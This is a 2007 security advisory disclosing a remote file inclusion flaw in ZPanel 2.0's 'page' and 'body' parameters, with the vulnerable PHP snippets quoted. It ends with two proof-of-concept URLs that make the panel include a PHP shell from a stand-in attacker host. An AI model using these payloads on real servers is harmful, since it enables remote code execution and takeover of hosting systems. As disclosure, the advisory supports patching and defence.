zpanel.txt
Posted on 24 February 2007
ZPanel Remote File Inclusion ZPanel is a hosting control panel used by web hosts to give their users a friendly interface to manage any aspects of their hosting or account information. ZPanel is an open source project and runs on Windows and Linux. zpanel tested on : Windows : 2000 Adv. Server,2000 Server,2003 Ent. Server,XP Professional Linux : SuSE 9.1, 9.2 ,Debian,Fedora 2,FreeBSD 4.9, 5.2.1,Mandrake 9.1, 9.2,Redhat 7.9, 9 http://www.thezpanel.com http://www.zee-way.com http://forge.novell.com/modules/xfmod/project/?zpanel Credit: The information has been provided by Hamid Ebadi The original article can be found at : http://www.bugtraq.ir/articles/advisory/ZPanel-Remote-File-Inclusion/2 Vulnerable Systems: Version: ZPanel 2.0 (and below) (also tested on ZPanel-v25-BETA11 ) Description: Input passed to the "page" parameter in "zpanel.php" and "body" parameter in "templates/ZPanelV2/template.php" isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from remote and local resources. Vulnerable Code : http://[host]/ZPanel/zpanel.php // zpanel.php line : 21 if (!isset($_GET['page'])){ $body = "main.php"; }else{ $body = $_GET['page'] . ".php"; } // ... // line : 38 //Loading template $templatefolder = $row_Config['template']; include('templates/'.$templatefolder.'/template.php'); http://[host]/ZPanel/templates/ZPanelV2/template.php // template.php // line : 63 <?php include ($body); ?> POC exploit : http://[host]/ZPanel/zpanel.php?page=http://attacker/phpshell.txt? http://[host]/ZPanel/templates/ZPanelV2/template.php?body=http://attacker/phpshell.txt? # http://www.bugtraq.ir